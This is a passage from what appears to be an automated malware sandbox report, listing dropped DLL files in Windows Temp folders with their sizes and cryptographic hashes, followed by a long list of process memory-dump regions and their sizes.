                                                                                                                                                                                                                    3e89ff837147c16b4e41c30d6c796374e0b8e62c

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\nse5054.tmp\jsis.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    127KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    4b27df9758c01833e92c51c24ce9e1d5

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    c3e227564de6808e542d2a91bbc70653cf88d040

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    d37408f77b7a4e7c60800b6d60c47305b487e8e21c82a416784864bd9f26e7bb

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    666f1b99d65169ec5b8bc41cdbbc5fe06bcb9872b7d628cb5ece051630a38678291ddc84862101c727f386c75b750c067177e6e67c1f69ab9f5c2e24367659f4

                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\nse5054.tmp\nsJSON.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    36KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    ddb56a646aea54615b29ce7df8cd31b8

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    0ea1a1528faafd930ddceb226d9deaf4fa53c8b2

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    07e602c54086a8fa111f83a38c2f3ee239f49328990212c2b3a295fade2b5069

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    5d5d6ee7ac7454a72059be736ec8da82572f56e86454c5cbfe26e7956752b6df845a6b0fada76d92473033ca68cd9f87c8e60ac664320b015bb352915abe33c8

                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\nse5054.tmp\thirdparty.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    93KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    070335e8e52a288bdb45db1c840d446b

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    9db1be3d0ab572c5e969fea8d38a217b4d23cab2

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    c8cf0cf1c2b8b14cbedfe621d81a79c80d70f587d698ad6dfb54bbe8e346fbbc

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    6f49b82c5dbb84070794bae21b86e39d47f1a133b25e09f6a237689fd58b7338ae95440ae52c83fda92466d723385a1ceaf335284d4506757a508abff9d4b44c

                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\nso676C.tmp\Midex.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    126KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    581c4a0b8de60868b89074fe94eb27b9

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    70b8bdfddb08164f9d52033305d535b7db2599f6

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    b13c23af49da0a21959e564cbca8e6b94c181c5eeb95150b29c94ff6afb8f9dd

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    94290e72871c622fc32e9661719066bafb9b393e10ed397cae8a6f0c8be6ed0df88e5414f39bc528bf9a81980bdcb621745b6c712f4878f0447595cec59ee33d

                                                                                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\{3E3D7F55-EE13-45AB-BCDA-6A63BA65DF64}\scrt.dll

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    f36f05628b515262db197b15c7065b40

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    74a8005379f26dd0de952acab4e3fc5459cde243

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    67abd9e211b354fa222e7926c2876c4b3a7aca239c0af47c756ee1b6db6e6d31

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    280390b1cf1b6b1e75eaa157adaf89135963d366b48686d48921a654527f9c1505c195ca1fc16dc85b8f13b2994841ca7877a63af708883418a1d588afa3dbe8

                                                                                                                                                                                                                  • memory/268-1140-0x00000000002C0000-0x00000000007F2000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    5.2MB

                                                                                                                                                                                                                  • memory/268-2204-0x00000000002C0000-0x00000000007F2000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    5.2MB

                                                                                                                                                                                                                  • memory/268-1139-0x00000000002C0000-0x00000000007F2000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    5.2MB

                                                                                                                                                                                                                  • memory/816-2262-0x000000001B850000-0x000000001BB32000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    2.9MB

                                                                                                                                                                                                                  • memory/816-2263-0x0000000001CD0000-0x0000000001CD8000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                  • memory/1640-1126-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                  • memory/2044-1294-0x00000000040B0000-0x00000000043C5000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    3.1MB

                                                                                                                                                                                                                  • memory/2044-2211-0x00000000040B0000-0x00000000043C5000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    3.1MB

                                                                                                                                                                                                                  • memory/2388-1173-0x0000000000130000-0x0000000000131000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1171-0x0000000000130000-0x0000000000131000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1166-0x0000000000120000-0x0000000000121000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1164-0x0000000000120000-0x0000000000121000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1163-0x0000000000110000-0x0000000000111000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1161-0x0000000000110000-0x0000000000111000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1159-0x0000000000110000-0x0000000000111000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1168-0x0000000000120000-0x0000000000121000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1176-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1178-0x0000000000140000-0x0000000000141000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1181-0x0000000000150000-0x0000000000151000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2388-1183-0x0000000000150000-0x0000000000151000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                  • memory/2492-1297-0x0000000000400000-0x0000000000715000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    3.1MB

                                                                                                                                                                                                                  • memory/2492-1316-0x0000000000400000-0x0000000000715000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    3.1MB

                                                                                                                                                                                                                  • memory/2728-23-0x000007FEFD4B0000-0x000007FEFD4B2000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-18-0x0000000077770000-0x0000000077772000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-1923-0x000000013F3C5000-0x000000013F5BA000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                  • memory/2728-5-0x000000013F3C5000-0x000000013F5BA000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                  • memory/2728-1064-0x000000013F3C5000-0x000000013F5BA000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                  • memory/2728-31-0x000000013F260000-0x000000013F8D5000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    6.5MB

                                                                                                                                                                                                                  • memory/2728-30-0x000007FEFD4C0000-0x000007FEFD4C2000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-28-0x000007FEFD4C0000-0x000007FEFD4C2000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-25-0x000007FEFD4B0000-0x000007FEFD4B2000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-4-0x0000000077740000-0x0000000077742000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-16-0x0000000077770000-0x0000000077772000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-2-0x0000000077740000-0x0000000077742000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-20-0x0000000077770000-0x0000000077772000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-11-0x0000000077760000-0x0000000077762000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-13-0x0000000077760000-0x0000000077762000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-15-0x0000000077760000-0x0000000077762000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-6-0x0000000077750000-0x0000000077752000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-8-0x0000000077750000-0x0000000077752000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-10-0x0000000077750000-0x0000000077752000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2728-0-0x0000000077740000-0x0000000077742000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                  • memory/2840-2225-0x0000000000400000-0x0000000000715000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    3.1MB

                                                                                                                                                                                                                  • memory/2840-1318-0x0000000000400000-0x0000000000715000-memory.dmp

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    3.1MB